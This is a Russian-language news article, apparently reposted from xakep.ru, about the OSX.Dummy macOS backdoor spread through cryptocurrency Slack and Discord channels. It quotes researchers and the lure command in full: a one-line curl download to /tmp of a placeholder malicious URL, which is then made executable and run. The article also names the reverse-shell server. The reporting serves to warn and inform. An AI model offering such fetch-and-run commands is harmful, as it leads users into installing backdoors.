html текст
All interests
  • All interests
  • Design
  • Food
  • Gadgets
  • Humor
  • News
  • Photo
  • Travel
  • Video
Click to see the next recommended page
Like it
Don't like
Add to Favorites

В каналах Slack и Discord, посвященных криптовалютам, распространяется вредонос для Mac

ИБ-специалисты обнаружили странного вредоноса для macOS, которому в итоге присвоили саркастическое название OSX.Dummy («дурак» в переводе с английского).

Первым угрозу заметил Ремко Верхуф (Remco Verhoef), основатель DutchSec и эксперт ISC SANS. Он сообщил, что мошенники действуют через каналы Slack и Discord, посвященные криптовалютам. Выдавая себя за администраторов, модераторов и известных в криптовалютном сообществе личностей, они распространяли в каналах сообщения с призывом для пользователей Mac. Уверяли, что нужно ввести команду в терминале, и якобы это поможет решить многие проблемы.

Команда, которую можно увидеть ниже, приводила к загрузке в директорию /tmp огромного бинарника (34 Мб) с названием script, а затем к его выполнению с root-правами.

cd /tmp && curl -s curl $ВРЕДОНОСНЫЙ_URL > script && chmod +x script && ./script

После этого script делал себя launch-демоном, чтобы закрепиться в системе, и создавал Python-скрипт, открывавший reverse shell к серверу 185.243.115.230:1337. Смысл этих действий был прост: предоставить атакующим доступ к скомпрометированной системе.

Специалист Malwarebytes Томас Рид (Thomas Reed), так же заметивший странную вредоносную кампанию, пишет, что конечные цели неизвестных злоумышленников пока ясны не до конца. Учитывая, что преступники выбрали своими жертвами пользователей, интересующихся криптовалютами и майнингом, вероятно, бэкдоры планировали использовать для хищения криптовалют.

Еще одним экспертом, изучившим новую вредоносную кампанию, стал известный специалист в области безопасности Mac Патрик Уордл (Patrick Wardle). Именно Уордл дал малвари имя OSX.Dummy. Эксперт сообщил, что давно не видел ничего глупее вредоноса, который просит у пользователя root-пароль, а также просит саму жертву выполнить на устройстве вредоносную команду.

Хуже того, эксперты предупреждают, что пароль не передается на удаленный сервер, но сохраняется в Users/Shared/dumpdummy и /tmp/dumpdummy, чтобы его можно было использовать для других вредоносный операций. Проблема в том, что root-пароль хранится незашифрованным, в открытом виде, и файл с паролем может сохраниться на устройстве даже после удаления самого OSX.Dummy. По мнению специалистов, впоследствии могут появиться другие вредоносы, которые станут прицельно искать пароли, ранее сохраненные OSX.Dummy.

«Я назвал его OSX.Dummy потому что:

метод заражения дурацкий;
огромный размер бинарника – это глупо;
механизм закрепления в системе жалок (следовательно, он дурацкий);
возможности [вредоноса] весьма ограничены (следовательно, он дурацкий);
его легко обнаружить на каждом этапе (это глупо);
…и наконец, малварь сохраняет пароли пользователей в dumpdummy», — пишет Уордл.

Читать дальше
Twitter
Одноклассники
Мой Мир

материал с xakep.ru

1

      Add

      You can create thematic collections and keep, for instance, all recipes in one place so you will never lose them.

      No images found
      Previous Next 0 / 0
      500
      • Advertisement
      • Animals
      • Architecture
      • Art
      • Auto
      • Aviation
      • Books
      • Cartoons
      • Celebrities
      • Children
      • Culture
      • Design
      • Economics
      • Education
      • Entertainment
      • Fashion
      • Fitness
      • Food
      • Gadgets
      • Games
      • Health
      • History
      • Hobby
      • Humor
      • Interior
      • Moto
      • Movies
      • Music
      • Nature
      • News
      • Photo
      • Pictures
      • Politics
      • Psychology
      • Science
      • Society
      • Sport
      • Technology
      • Travel
      • Video
      • Weapons
      • Web
      • Work
        Submit
        Valid formats are JPG, PNG, GIF.
        Not more than 5 Мb, please.
        30
        surfingbird.ru/site/
        RSS format guidelines
        500
        • Advertisement
        • Animals
        • Architecture
        • Art
        • Auto
        • Aviation
        • Books
        • Cartoons
        • Celebrities
        • Children
        • Culture
        • Design
        • Economics
        • Education
        • Entertainment
        • Fashion
        • Fitness
        • Food
        • Gadgets
        • Games
        • Health
        • History
        • Hobby
        • Humor
        • Interior
        • Moto
        • Movies
        • Music
        • Nature
        • News
        • Photo
        • Pictures
        • Politics
        • Psychology
        • Science
        • Society
        • Sport
        • Technology
        • Travel
        • Video
        • Weapons
        • Web
        • Work

          Submit

          Thank you! Wait for moderation.

          Тебе это не нравится?

          You can block the domain, tag, user or channel, and we'll stop recommend it to you. You can always unblock them in your settings.

          • xakep.ru
          • домен xakep.ru

          Get a link

          Спасибо, твоя жалоба принята.

          Log on to Surfingbird

          Recover
          Sign up

          or

          Welcome to Surfingbird.com!

          You'll find thousands of interesting pages, photos, and videos inside.
          Join!

          • Personal
            recommendations

          • Stash
            interesting and useful stuff

          • Anywhere,
            anytime

          Do we already know you? Login or restore the password.

          Close

          Add to collection

             

            Facebook

            Ваш профиль на рассмотрении, обновите страницу через несколько секунд

            Facebook

            К сожалению, вы не попадаете под условия акции